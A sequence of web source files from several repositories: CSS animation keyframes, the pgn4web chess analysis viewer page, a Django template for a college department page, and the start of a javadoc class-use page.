-o-animation-timing-function: ease-out;
animation-timing-function: ease-out;
}
@-webkit-keyframes lightSpeedOut {
0% { -webkit-transform: translateX(0%) skewX(0deg); opacity: 1; }
100% { -webkit-transform: translateX(100%) skewX(-30deg); opacity: 0; }
}
@-moz-keyframes lightSpeedOut {
0% { -moz-transform: translateX(0%) skewX(0deg); opacity: 1; }
100% { -moz-transform: translateX(100%) skewX(-30deg); opacity: 0; }
}
@-o-keyframes lightSpeedOut {
0% { -o-transform: translateX(0%) skewX(0deg); opacity: 1; }
100% { -o-transform: translateX(100%) skewX(-30deg); opacity: 0; }
}
@keyframes lightSpeedOut {
0% { transform: translateX(0%) skewX(0deg); opacity: 1; }
100% { transform: translateX(100%) skewX(-30deg); opacity: 0; }
}
.lightSpeedOut {
-webkit-animation-name: lightSpeedOut;
-moz-animation-name: lightSpeedOut;
-o-animation-name: lightSpeedOut;
animation-name: lightSpeedOut;
-webkit-animation-timing-function: ease-in;
-moz-animation-timing-function: ease-in;
-o-animation-timing-function: ease-in;
animation-timing-function: ease-in;
}
@-webkit-keyframes hinge {
0% { -webkit-transform: rotate(0); -webkit-transform-origin: top left; -webkit-animation-timing-function: ease-in-out; }
20%, 60% { -webkit-transform: rotate(80deg); -webkit-transform-origin: top left; -webkit-animation-timing-function: ease-in-out; }
40% { -webkit-transform: rotate(60deg); -webkit-transform-origin: top left; -webkit-animation-timing-function: ease-in-out; }
80% { -webkit-transform: rotate(60deg) translateY(0); opacity: 1; -webkit-transform-origin: top left; -webkit-animation-timing-function: ease-in-out; }
100% { -webkit-transform: translateY(700px); opacity: 0; }
}
@-moz-keyframes hinge {
0% { -moz-transform: rotate(0); -moz-transform-origin: top left; -moz-animation-timing-function: ease-in-out; }
20%, 60% { -moz-transform: rotate(80deg); -moz-transform-origin: top left; -moz-animation-timing-function: ease-in-out; }
40% { -moz-transform: rotate(60deg); -moz-transform-origin: top left; -moz-animation-timing-function: ease-in-out; }
80% { -moz-transform: rotate(60deg) translateY(0); opacity: 1; -moz-transform-origin: top left; -moz-animation-timing-function: ease-in-out; }
100% { -moz-transform: translateY(700px); opacity: 0; }
}
@-o-keyframes hinge {
0% { -o-transform: rotate(0); -o-transform-origin: top left; -o-animation-timing-function: ease-in-out; }
20%, 60% { -o-transform: rotate(80deg); -o-transform-origin: top left; -o-animation-timing-function: ease-in-out; }
40% { -o-transform: rotate(60deg); -o-transform-origin: top left; -o-animation-timing-function: ease-in-out; }
80% { -o-transform: rotate(60deg) translateY(0); opacity: 1; -o-transform-origin: top left; -o-animation-timing-function: ease-in-out; }
100% { -o-transform: translateY(700px); opacity: 0; }
}
@keyframes hinge {
0% { transform: rotate(0); transform-origin: top left; animation-timing-function: ease-in-out; }
20%, 60% { transform: rotate(80deg); transform-origin: top left; animation-timing-function: ease-in-out; }
40% { transform: rotate(60deg); transform-origin: top left; animation-timing-function: ease-in-out; }
80% { transform: rotate(60deg) translateY(0); opacity: 1; transform-origin: top left; animation-timing-function: ease-in-out; }
100% { transform: translateY(700px); opacity: 0; }
}
.hinge {
-webkit-animation-name: hinge;
-moz-animation-name: hinge;
-o-animation-name: hinge;
animation-name: hinge;
}
/* originally authored by Nick Pettit - https://github.com/nickpettit/glide */
@-webkit-keyframes rollIn {
0% { opacity: 0; -webkit-transform: translateX(-100%) rotate(-120deg); }
100% { opacity: 1; -webkit-transform: translateX(0px) rotate(0deg); }
}
@-moz-keyframes rollIn {
0% { opacity: 0; -moz-transform: translateX(-100%) rotate(-120deg); }
100% { opacity: 1; -moz-transform: translateX(0px) rotate(0deg); }
}
@-o-keyframes rollIn {
0% { opacity: 0; -o-transform: translateX(-100%) rotate(-120deg); }
100% { opacity: 1; -o-transform: translateX(0px) rotate(0deg); }
}
@keyframes rollIn {
0% { opacity: 0; transform: translateX(-100%) rotate(-120deg); }
100% { opacity: 1; transform: translateX(0px) rotate(0deg); }
}
.rollIn {
-webkit-animation-name: rollIn;
-moz-animation-name: rollIn;
-o-animation-name: rollIn;
animation-name: rollIn;
}
/* originally authored by Nick Pettit - https://github.com/nickpettit/glide */
@-webkit-keyframes rollOut {
0% {
opacity: 1;
-webkit-transform: translateX(0px) rotate(0deg);
}
100% {
opacity: 0;
-webkit-transform: translateX(100%) rotate(120deg);
}
}
@-moz-keyframes rollOut {
0% {
opacity: 1;
-moz-transform: translateX(0px) rotate(0deg);
}
100% {
opacity: 0;
-moz-transform: translateX(100%) rotate(120deg);
}
}
@-o-keyframes rollOut {
0% {
opacity: 1;
-o-transform: translateX(0px) rotate(0deg);
}
100% {
opacity: 0;
-o-transform: translateX(100%) rotate(120deg);
}
}
@keyframes rollOut {
0% {
opacity: 1;
transform: translateX(0px) rotate(0deg);
}
100% {
opacity: 0;
transform: translateX(100%) rotate(120deg);
}
}
.rollOut {
-webkit-animation-name: rollOut;
-moz-animation-name: rollOut;
-o-animation-name: rollOut;
animation-name: rollOut;
}
|
analysis.html | dmcgrath/ChessPGN | <!DOCTYPE HTML>
<html>
<!--
pgn4web javascript chessboard
copyright (C) 2009-2014 Paolo Casaschi
see README file and http://pgn4web.casaschi.net
for credits, license and more details
-->
<head>
<title>0.</title>
<!-- use viewport settings when body.onresize adapts the chessboard to the available space -->
<meta name="viewport" content="initial-scale=1, maximum-scale=1">
<link rel="icon" sizes="16x16" href="pawn.ico" />
<link href="analysis.css" type="text/css" rel="stylesheet" />
<script src="pgn4web.js" type="text/javascript"></script>
<script src="fonts/chess-informant-NAG-symbols.js" type="text/javascript"></script>
<script src="engine.js" type="text/javascript"></script>
<script src="fide-lookup.js" type="text/javascript"></script>
<script type="text/javascript">
"use strict";
var pgn4web_engineWindowUrlParameters = "as=66&ss=36&ps=29&pf=m&fms=14&fcs=22&lch=FFFFFF&dch=DDDDDD&hch=AAAAAA&ctch=808080&fpr=0";
var pgn4web_engineWindowTarget = "pgn4webAnalysisBoardForAnalysis";
var pgn4web_engineWindowHeight = "";
var pgn4web_engineWindowWidth = "";
var thisRegExp;
thisRegExp = /(&|\?)(help|h)=(true|t)(&|$)/i;
if (window.location.search.match(thisRegExp) !== null) {
alert("pgn4web analysis.html parameters" + "\n" +
" - pgnFile = filename.pgn" + "\n" +
" - initialGame = first | last | random | a number | a search expression (default first)" + "\n" +
" - initialVariation = a number (default 0)" + "\n" +
" - initialHalfmove = start | end | random | comment | variation | a number (default start)" + "\n" +
" - showPrevNext = true | false (default false)" + "\n" +
" - showGamesList = true | false (default false)" + "\n" +
" - beautifyTags = true | false (default true)" + "\n" +
" - help = true");
}
var pgnFilename = "";
thisRegExp = /(&|\?)(pgnFile|pf)=([^&]*)(&|$)/i;
if (window.location.search.match(thisRegExp) !== null) {
pgnFilename = unescape(window.location.search.match(thisRegExp)[3]);
} else {
// accepts pgnData as alias for pgnFile for consistency with board.html
thisRegExp = /(&|\?)(pgnData|pd)=([^&]*)(&|$)/i;
if (window.location.search.match(thisRegExp) !== null) {
pgnFilename = unescape(window.location.search.match(thisRegExp)[3]);
}
}
if (pgnFilename !== "") { SetPgnUrl(pgnFilename); }
thisRegExp = /(&|\?)(initialGame|ig)=([^&]*)(&|$)/i;
if (window.location.search.match(thisRegExp) !== null) {
SetInitialGame(unescape(window.location.search.match(thisRegExp)[3]));
}
thisRegExp = /(&|\?)(initialVariation|iv)=([^&]*)(&|$)/i;
if (window.location.search.match(thisRegExp) !== null) {
SetInitialVariation(unescape(window.location.search.match(thisRegExp)[3]));
}
thisRegExp = /(&|\?)(initialHalfmove|ih)=([^&]*)(&|$)/i;
if (window.location.search.match(thisRegExp) !== null) {
SetInitialHalfmove(unescape(window.location.search.match(thisRegExp)[3]), false);
}
thisRegExp = /(&|\?)(showLastNext|sln)=(true|t)(&|$)/i;
var showLastNext = (window.location.search.match(thisRegExp) !== null);
thisRegExp = /(&|\?)(showGamesList|sgl)=(true|t)(&|$)/i;
var showGamesList = (window.location.search.match(thisRegExp) !== null);
thisRegExp = /(&|\?)(beautifyTags|bt)=(false|f)(&|$)/i;
var beautifyTags = (window.location.search.match(thisRegExp) === null);
SetImagePath("images/merida/39");
SetImageType("png");
SetHighlightOption(true);
SetGameSelectorOptions(null, true, 12, 12, 2, 15, 15, 3, 10); // (head, num, chEvent, chSite, chRound, chWhite, chBlack, chResult, chDate);
SetCommentsIntoMoveText(true);
SetCommentsOnSeparateLines(false);
SetAutoplayDelay(1000); // milliseconds
SetAutostartAutoplay(false);
SetAutoplayNextGame(false);
SetShortcutKeysEnabled(true);
// customShortcutKey_Shift_1 defined by fide-lookup.js
// customShortcutKey_Shift_2 defined by fide-lookup.js
function customShortcutKey_Shift_3() { toggleLastNext(); }
function customShortcutKey_Shift_4() { toggleGamesList(); }
function customShortcutKey_Shift_5() { toggleBeautifyTags(); }
// overwriting engine.js definitions
function customShortcutKey_Shift_8() { showAnalysisBoard(true); }
function customShortcutKey_Shift_9() { showAnalysisBoard(false); }
function customShortcutKey_Shift_0() { showAnalysisBoard(); }
if (!pgn4web_engineWindowDisableAnalysisBoard) {
boardShortcut("E8", "open/update analysis board", function(t,e){ showAnalysisBoard(e.shiftKey); });
boardShortcut("F8", "close/pause analysis board", function(t,e){ if (!e.shiftKey) { hideAnalysisBoard(); } });
}
boardShortcut("E7", "toggle last/next moves information", function(t,e){ toggleLastNext(); });
boardShortcut("G7", "toggle show comments on separate lines", function(t,e){ if (e.shiftKey) { SetCommentsIntoMoveText(!commentsIntoMoveText); } else { SetCommentsOnSeparateLines(!commentsOnSeparateLines); } var oldPly = CurrentPly; var oldVar = CurrentVar; Init(); GoToMove(oldPly, oldVar); });
boardShortcut("G6", "search next annotator", function(t,e){ searchAnnotator(e.shiftKey); });
boardShortcut("H6", "scroll moves text to top", function(t,e){ document.getElementById("GameTextResult").scrollTop = 0; });
boardShortcut("F5", "toggle games list", function(t,e){ toggleGamesList(); });
boardShortcut("G5", "scroll moves text to current move", function(t,e){ autoScrollToCurrentMoveIfEnabled(); });
boardShortcut("H5", "scroll moves text to bottom", function(t,e){ document.getElementById("GameTextResult").scrollTop = document.getElementById("GameTextResult").scrollHeight; });
function FlipBoard() {}
var firstCustomFunctionOnPgnTextLoad = true;
function customFunctionOnPgnTextLoad() {
myOnResize();
if (firstCustomFunctionOnPgnTextLoad) {
firstCustomFunctionOnPgnTextLoad = false;
showEngineAnalysisBoard(true, true); // prepare analysis frame with an idle board
}
}
function customFunctionOnPgnGameLoad() {
var theObj, theOther, theThird, theMatch, newTitle, newTitleBlock;
if ((theObj = document.getElementById('GameEvent')) && (theMatch = gameRound[currentGame].match(/^\d+/))) { theObj.innerHTML += ' (' + theMatch[0] + ')'; }
fixObjInnerHTML('GameEvent');
fixObjInnerHTML('GameSite');
if (theObj = document.getElementById('GameDate')) { theObj.innerHTML = (theMatch = gameDate[currentGame].match(/^\d+/)) ? theMatch[0] : ''; }
fixObjInnerHTML('GameDate');
fixObjInnerHTML('GameWhite');
fixObjInnerHTML('GameBlack');
fixObjInnerHTML('GameResult');
if (theObj = document.getElementById('GameNum')) { theObj.innerHTML = (currentGame + 1); }
fixObjInnerHTML('GameNum');
customPgnHeaderTag('WhiteElo', 'GameWhiteElo');
fixObjInnerHTML('GameWhiteElo');
customPgnHeaderTag('BlackElo', 'GameBlackElo');
fixObjInnerHTML('GameBlackElo');
customPgnHeaderTag('ECO', 'GameECO');
fixObjInnerHTML('GameECO');
customPgnHeaderTag('Annotator', 'GameAnnotator');
fixObjInnerHTML('GameAnnotator');
theObj = document.getElementById('GameWhite');
theOther = document.getElementById('GameWhiteElo');
if (theObj && theObj.innerHTML && theOther && theOther.innerHTML) { theOther.style.marginLeft = '1ex'; }
theObj = document.getElementById('GameBlack');
theOther = document.getElementById('GameBlackElo');
if (theObj && theObj.innerHTML && theOther && theOther.innerHTML) { theOther.style.marginLeft = '1ex'; }
theObj = document.getElementById('GameSite');
theOther = document.getElementById('GameEvent');
if (theObj && theObj.innerHTML && theOther && theOther.innerHTML) { theOther.style.marginLeft = '1ex'; }
theThird = document.getElementById('GameDate');
if (((theObj && theObj.innerHTML) || (theOther && theOther.innerHTML)) && (theThird && theThird.innerHTML)) { theThird.style.marginLeft = '1ex'; }
newTitle = (currentGame + 1) + '.';
if ((theObj = document.getElementById('GameWhite')) && (theObj.innerHTML)) { newTitle += '\u00a0 ' + theObj.innerHTML; }
if ((theObj = document.getElementById('GameBlack')) && (theObj.innerHTML)) { newTitle += '\u00a0 ' + theObj.innerHTML; }
if ((theObj = document.getElementById('GameResult')) && (theObj.innerHTML)) { newTitle += '\u00a0 ' + theObj.innerHTML; }
if ((theObj = document.getElementById('GameSite')) && (theObj.innerHTML)) { newTitle += '\u00a0 ' + theObj.innerHTML; }
if ((theObj = document.getElementById('GameEvent')) && (theObj.innerHTML)) { newTitle += '\u00a0 ' + theObj.innerHTML; }
if ((theObj = document.getElementById('GameDate')) && (theObj.innerHTML)) { newTitle += '\u00a0 ' + theObj.innerHTML; }
document.title = simpleHtmlentitiesDecode(newTitle);
newTitle = (currentGame + 1) + '.';
newTitleBlock = '';
if ((theObj = document.getElementById('GameWhite')) && (theObj.innerHTML)) { newTitleBlock += theObj.innerHTML; }
if ((theObj = document.getElementById('GameWhiteElo')) && (theObj.innerHTML)) { newTitleBlock += (newTitleBlock ? ' ' : '') + theObj.innerHTML; }
if (newTitleBlock) { newTitle += '\n' + newTitleBlock; }
newTitleBlock = '';
if ((theObj = document.getElementById('GameBlack')) && (theObj.innerHTML)) { newTitleBlock += theObj.innerHTML; }
if ((theObj = document.getElementById('GameBlackElo')) && (theObj.innerHTML)) { newTitleBlock += (newTitleBlock ? ' ' : '') + theObj.innerHTML; }
if (newTitleBlock) { newTitle += '\n' + newTitleBlock; }
newTitleBlock = '';
if ((theObj = document.getElementById('GameSite')) && (theObj.innerHTML)) { newTitleBlock += theObj.innerHTML; }
if ((theObj = document.getElementById('GameEvent')) && (theObj.innerHTML)) { newTitleBlock += theObj.innerHTML; }
if ((theObj = document.getElementById('GameDate')) && (theObj.innerHTML)) { newTitleBlock += (newTitleBlock ? ' ' : '') + theObj.innerHTML; }
if (newTitleBlock) { newTitle += '\n' + newTitleBlock; }
newTitleBlock = '';
if ((theObj = document.getElementById('GameECO')) && (theObj.innerHTML)) { newTitleBlock += theObj.innerHTML; }
if (newTitleBlock) { newTitle += '\n' + newTitleBlock; }
if (theObj = document.getElementById('boardHeaderInfo')) { theObj.title = simpleHtmlentitiesDecode(newTitle); }
}
function fixObjInnerHTML(id) {
if (!beautifyTags) { return; }
var theObj = document.getElementById(id);
if (theObj) {
theObj.innerHTML = theObj.innerHTML.replace(/\.?\?[.?]*/, "").replace(/,(\w)/g, ", $1");
}
}
function searchPlayer(name, FideId) {
if (typeof(openFidePlayerUrl) == "function") { openFidePlayerUrl(name, FideId); }
}
function searchAnnotator(same) {
var fixedAnnotator = fixRegExp(customPgnHeaderTag("Annotator"));
searchPgnGame(same ? '\\[\\s*Annotator\\s*"' + fixedAnnotator + '"\\s*\\]' : '\\[\\s*Annotator\\s*"(?!' + fixedAnnotator + '"\\s*\\])', false);
document.getElementById("GameTextResult").scrollTop = document.getElementById("GameTextResult").scrollHeight;
}
function myOnResize() {
var ww, wh, theObj;
if (window.innerWidth && window.innerHeight) { ww = window.innerWidth; wh = window.innerHeight; }
else if (document.documentElement && document.documentElement.clientWidth) { ww = document.documentElement.clientWidth; wh = document.documentElement.clientHeight; }
else if (document.body && document.body.clientWidth) { ww = document.body.clientWidth; wh = document.body.clientHeight; }
else { return; }
if (theObj = document.getElementById("GameTextResult")) { theObj.style.height = (wh - 60) + "px"; }
autoScrollToCurrentMoveIfEnabled();
}
enableAutoScrollToCurrentMove("GameTextResult");
var thisEngineWin;
var thisEngineWinShown = false;
function showAnalysisBoard(de) {
if (pgn4web_engineWindowDisableAnalysisBoard) { return; }
var theObj;
if ((thisEngineWin = showEngineAnalysisBoard(de)) && (!thisEngineWinShown)) {
if (theObj = document.getElementById('analysisHeader')) {
theObj.style.left = "451px"; // 436px boardheaderDiv.width + 15px gametextresultDiv.paddingLeft
}
if (theObj = document.getElementById('GameTextResult')) {
theObj.style.marginLeft = "769px"; // 451px analysisHeader.left + 288px analysisHeader.width + 30px padding
}
setTimeout(autoScrollToCurrentMoveIfEnabled, 2100);
thisEngineWinShown = true;
}
}
function hideAnalysisBoard() {
if (pgn4web_engineWindowDisableAnalysisBoard) { return; }
var theObj;
if (thisEngineWinShown) {
if (theObj = document.getElementById('analysisHeader')) {
theObj.style.left = "";
}
if (theObj = document.getElementById('GameTextResult')) {
theObj.style.marginLeft = "";
}
setTimeout(autoScrollToCurrentMoveIfEnabled, 2100);
thisEngineWinShown = false;
}
if (typeof(thisEngineWin) != "undefined") {
if (typeof(thisEngineWin.StopBackgroundEngine) == "function") { thisEngineWin.StopBackgroundEngine(); }
if (typeof(thisEngineWin.autoUpdate) != "undefined") { thisEngineWin.autoUpdate = false; }
}
}
function toggleLastNext(sln) {
showLastNext = (typeof(sln) == "undefined") ? !showLastNext : sln;
var theObj = document.getElementById("GameLastNext");
if (theObj) {
theObj.style.display = showLastNext ? "" : "none";
}
if (theObj = document.getElementById("GameSelector")) {
theObj.style.top = showLastNext ? "0" : "30px";
}
}
function toggleGamesList(sgl) {
showGamesList = (typeof(sgl) == "undefined") ? !showGamesList : sgl;
var theObj = document.getElementById("GamesList");
if (theObj) {
theObj.style.display = showGamesList ? "" : "none";
}
}
function toggleBeautifyTags(bt) {
beautifyTags = (typeof(bt) == "undefined") ? !beautifyTags : bt;
Init(currentGame);
}
</script>
</head>
<body onResize="myOnResize();">
<!-- paste your PGN below and make sure you dont specify an external source with SetPgnUrl() -->
<form style="display: none;"><textarea style="display: none;" id="pgnText">
</textarea></form>
<!-- paste your PGN above and make sure you dont specify an external source with SetPgnUrl() -->
<div class="analysisheaderDiv" id="analysisHeader">
<iframe class="gameAnalysisFrame" id="GameAnalysisFrame" name="pgn4webAnalysisBoardForAnalysis" src="./blank.html" frameborder="0" scrolling="no" marginheight="0" marginwidth="0">your web browser and/or your host do not support iframes as required</iframe>
</div>
<div class="boardheaderDiv" id="boardHeader">
<div id="boardHeaderInfo">
<table cellspacing=0 cellpadding=0 border=0><tr>
<td><div class="headerLine gameNum"><span id="GameNum">1</span>.</div></td>
<td><div class="headerLine gameECO"><span id="GameECO"></span></div></td>
</tr></table>
<div class="shortRowSpace"> </div>
<div class="headerLine"><a id="GameWhite" href="javascript:void(0);" onclick="searchPlayer(this.innerHTML, customPgnHeaderTag('WhiteFideId')); this.blur();"></a><span id="GameWhiteElo"></span></div>
<div class="headerLine"><a id="GameBlack" href="javascript:void(0);" onclick="searchPlayer(this.innerHTML, customPgnHeaderTag('BlackFideId')); this.blur();"></a><span id="GameBlackElo"></span></div>
<div class="shortRowSpace"> </div>
<div class="headerLine gameSiteEventDate"><span id="GameSite"></span><span id="GameEvent"></span><span id="GameDate"></span></div>
<div class="shortRowSpace"> </div>
</div>
<div class="shortRowSpace"> </div>
<div id="GameBoard"></div>
<div id="GameLastNext" style="display: none;">
<div class="shortRowSpace"> </div>
<div class="shortRowSpace"> </div>
<div class="gameLastMove">
<span id="GameLastMove" title="last move"></span> <span id="GameLastVariations" title="last move alternatives"></span>
</div>
<div class="shortRowSpace"> </div>
<div class="gameNextMove">
<span id="GameNextMove" title="next move"></span> <span id="GameNextVariations" title="next move alternatives"></span>
</div>
</div>
<div class="gameList" id="GamesList" style="display: none;">
<div class="shortRowSpace"> </div>
<div class="shortRowSpace"> </div>
<div class="gameSelector" id="GameSelector"></div>
</div>
</div>
<div class="topSpacer"> </div>
<div class="gametextresultDiv" id="GameTextResult">
<div id="GameText"></div>
<div class="comment" style="line-height: 33%;"> </div>
<a class="gameAnnotator" id="GameAnnotator" href="javascript:void(0);" onclick="searchAnnotator(!event.shiftKey); this.blur();"></a>
<div id="GameResult"></div>
</div>
<a class="helpLink" title="pgn4web help" href="javascript:void(0);" onclick="displayHelp(); this.blur();">?</a>
<script type="text/javascript">
"use strict";
toggleLastNext(showLastNext);
toggleGamesList(showGamesList);
function pgn4web_handleTouchEnd_Header(e) {
e.stopPropagation();
var jj, deltaX, deltaY;
for (var ii = 0; ii < e.changedTouches.length; ii++) {
if ((jj = pgn4webOngoingTouchIndexById(e.changedTouches[ii].identifier)) != -1) {
if (pgn4webOngoingTouches.length == 1) {
deltaX = e.changedTouches[ii].clientX - pgn4webOngoingTouches[jj].clientX;
deltaY = e.changedTouches[ii].clientY - pgn4webOngoingTouches[jj].clientY;
if (Math.max(Math.abs(deltaX), Math.abs(deltaY)) >= 13) {
if (Math.abs(deltaX) > 1.5 * Math.abs(deltaY)) {
if (deltaX > 0) { // horizontal right
showAnalysisBoard(false);
} else { // horizontal left
hideAnalysisBoard();
}
} else if (Math.abs(deltaY) > 1.5 * Math.abs(deltaX)) { // vertical up or down
SetCommentsIntoMoveText(!commentsIntoMoveText);
var oldPly = CurrentPly;
var oldVar = CurrentVar;
Init();
GoToMove(oldPly, oldVar);
}
}
pgn4webMaxTouches = 0;
}
pgn4webOngoingTouches.splice(jj, 1);
}
}
clearSelectedText();
}
if (touchEventEnabled) {
var theObj = document.getElementById("boardHeader");
if (theObj) {
simpleAddEvent(theObj, "touchstart", pgn4web_handleTouchStart);
simpleAddEvent(theObj, "touchmove", pgn4web_handleTouchMove);
simpleAddEvent(theObj, "touchend", pgn4web_handleTouchEnd_Header);
simpleAddEvent(theObj, "touchleave", pgn4web_handleTouchEnd_Header);
simpleAddEvent(theObj, "touchcancel", pgn4web_handleTouchCancel);
}
theObj = document.getElementById("analysisHeader");
if (theObj) {
simpleAddEvent(theObj, "touchstart", pgn4web_handleTouchStart);
simpleAddEvent(theObj, "touchmove", pgn4web_handleTouchMove);
simpleAddEvent(theObj, "touchend", pgn4web_handleTouchEnd_Header);
simpleAddEvent(theObj, "touchleave", pgn4web_handleTouchEnd_Header);
simpleAddEvent(theObj, "touchcancel", pgn4web_handleTouchCancel);
}
}
</script>
</body>
</html>
|
templates/department/dept.html | bpain2010/kgecweb |
{% extends "nav.html" %}
{% block header%}
<div class="container-fluid pad" style="background-color:rgb(246,246,246)">
<div class="container" >
<div class="row">
<div class="col-lg-12 col-md-12">
{% for dept in dept_list %}
<h4 class="title_one"><b><i>Department of {{ dept.DeptFullName }}</i></b> </h4>
{% endfor %}
</div>
</div>
</div>
</div>
{% endblock %}
{% block body %}
<div class="container">
<div class="row">
{% block deptimage %}
<div class="col-xs-7">
{% for dept in dept_list %}
<img class="img-rounded img-responsive"src="{{ dept.DeptImage.large.url }}" alt="{{ dept.DeptImage.name }}" height="300" width="660">
{% endfor %}
</div>
{% endblock %}
{% block deptheader %}
<div class="col-xs-5">
{% for dept in dept_list %}
<div class="panel panel-primary">
<div class="panel-heading"><b><i>Department of {{ dept.DeptFullName}}</i></b></div>
<div class="panel-body" style ='background-color: #DCDCDC';>
{% endfor %}
{% endblock %}
{% block hoddata %}
{% for faculty in faculty_list %}
{% for dept in dept_list %}
{% if faculty.FacultyName == dept.DeptOwner %}
<div class="media">
<div class="pull-left">
<a href="/faculty/{{faculty.FaculyId}}">
<img class="img-rounded" src="{{ faculty.FacultyImage.thumbnail.url }}" alt="{{ faculty.FacultyImage.name }}" height="70" width="70">
</a>
</div>
<div class="media-body">
<h5 class="media-heading"><span class="glyphicon glyphicon-user" aria-hidden="true"></span> <b><i>{{ faculty.FacultyName}}</i></b></h5>
<p><span class="glyphicon glyphicon-envelope" aria-hidden="true"></span> {{faculty.FacultyEmail}}<br><span class="glyphicon glyphicon-phone-alt" aria-hidden="true"></span> {{faculty.FacultyContact}}</p>
</div>
{% endif %}
{% endfor %}
{% endfor %}
{% endblock %}
</div>
</div>
</div>
</div>
</div>
<hr>
<div class="row">
{% block faculty %}
<div class="col-xs-7">
<div class="panel panel-primary">
<div class="panel-heading"><b><i>Faculties</i></b></div>
<div class="panel-body" style ='background-color: #DCDCDC';>
<div class="row">
{% for faculty in faculty_list %}
<div class="col-sm-2">
<a href="/faculty/{{faculty.FaculyId}}">
<img class="img-rounded" src="{{ faculty.FacultyImage.thumbnail.url }}" alt="{{ faculty.FacultyImage.name }}" height="70" width="70">
</a>
<small>{{ faculty.FacultyName}}</small>
</div>
{% endfor %}
</div>
</div>
</div>
</div>
{% endblock %}
{% block aboutdept %}
<div class="col-xs-5" >
{% for dept in dept_list %}
<div class="panel panel-primary">
<div class="panel-heading"><b><i>From Head Of The Department</i></b></div>
<div class="panel-body" style ='background-color: #DCDCDC';>
<p class="text-justify"> {{ dept.DeptDescrip|safe }}</p>
</div>
</div>
{% endfor %}
</div>
{% endblock %}
</div>
<div class="row">
{% block staff %}
<div class="col-xs-12">
{% for staff in staff_list %}
<div class="col-sm-2">
<a href="#">
<img class="img-rounded" src="{{ staff.StaffImage.thumbnail.url }}" alt="{{ staff.StaffImage.name }}" height="142" width="142">
</a>
<b>{{ staff.StaffName}}</b>
</div>
{% endfor %}
</div>
{% endblock %}
</div>
</div>
{% endblock %}
|
lib/jersey1.9/apidocs/jsr311/javax/ws/rs/core/class-use/Variant.html | jonathanrcarter/divv-amsterdam-parkingapi | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--NewPage-->
<HTML>
<HEAD>
<!-- Generated by javadoc (build 1.5.0_19) on Mon Nov 09 13:45:48 CET 2009 -->
<META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<TITLE>
Uses of Class javax.ws.rs.core.Variant (jsr311-api 1.1.1 API)
</TITLE>
<LINK REL ="stylesheet" TYPE="text/css" HREF="../../../../../stylesheet.css" TITLE="Style">
<SCRIPT type="text/javascript">
function windowTitle()
{
parent.document.title="Uses of Class javax.ws.rs.core.Variant (jsr311-api 1.1.1 API)";
}
</SCRIPT>
<NOSCRIPT>
</NOSCRIPT>
</HEAD>
<BODY BGCOLOR="white" onload="windowTitle();">
<!-- ========= START OF TOP NAVBAR ======= -->
<A NAME="navbar_top"><!-- --></A>
<A HREF="#skip-navbar_top" title="Skip navigation links"></A>
<TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY="">
<TR>
<TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1">
<A NAME="navbar_top_firstrow"><!-- --></A>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY="">
<TR ALIGN="center" VALIGN="top">
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../javax/ws/rs/core/Variant.html" title="class in javax.ws.rs.core"><FONT CLASS="NavBarFont1"><B>Class</B></FONT></A> </TD>
<TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> <FONT CLASS="NavBarFont1Rev"><B>Use</B></FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A> </TD>
</TR>
</TABLE>
</TD>
<TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM>
</EM>
</TD>
</TR>
<TR>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
PREV
NEXT</FONT></TD>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../../../index.html?javax/ws/rs/core/class-use/Variant.html" target="_top"><B>FRAMES</B></A>
<A HREF="Variant.html" target="_top"><B>NO FRAMES</B></A>
<SCRIPT type="text/javascript">
<!--
if(window==top) {
document.writeln('<A HREF="../../../../../allclasses-noframe.html"><B>All Classes</B></A>');
}
//-->
</SCRIPT>
<NOSCRIPT>
<A HREF="../../../../../allclasses-noframe.html"><B>All Classes</B></A>
</NOSCRIPT>
</FONT></TD>
</TR>
</TABLE>
<A NAME="skip-navbar_top"></A>
<!-- ========= END OF TOP NAVBAR ========= -->
<HR>
<CENTER>
<H2>
<B>Uses of Class<br>javax.ws.rs.core.Variant</B></H2>
</CENTER>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2">
Packages that use <A HREF="../../../../../javax/ws/rs/core/Variant.html" title="class in javax.ws.rs.core">Variant</A></FONT></TH>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><A HREF="#javax.ws.rs.core"><B>javax.ws.rs.core</B></A></TD>
<TD>Low-level interfaces and annotations used to create RESTful service
resources. </TD>
</TR>
</TABLE>
<P>
<A NAME="javax.ws.rs.core"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2">
